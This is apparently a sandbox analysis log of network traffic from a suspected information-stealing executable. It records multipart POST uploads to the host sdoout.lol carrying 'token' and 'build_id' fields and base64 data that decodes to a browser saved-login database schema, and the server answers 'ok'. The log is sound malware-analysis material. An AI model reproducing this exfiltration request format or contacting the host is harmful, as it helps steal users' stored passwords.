                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8gdtjm7gvaaaie3wbaasContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------8gdtjm7gvaaaie3wbaasContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------8gdtjm7gvaaaie3wbaasCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:25 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          16192.168.2.949746116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:25 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----gdba168gln7qieuaaiwb
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 55081
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------gdba168gln7qieuaaiwbContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------gdba168gln7qieuaaiwbContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------gdba168gln7qieuaaiwbCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:25 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:25 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:26 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          17192.168.2.953847116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----k6xt0zusr1n7yu3wt26p
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 142457
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------k6xt0zusr1n7yu3wt26pContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------k6xt0zusr1n7yu3wt26pContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------k6xt0zusr1n7yu3wt26pCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
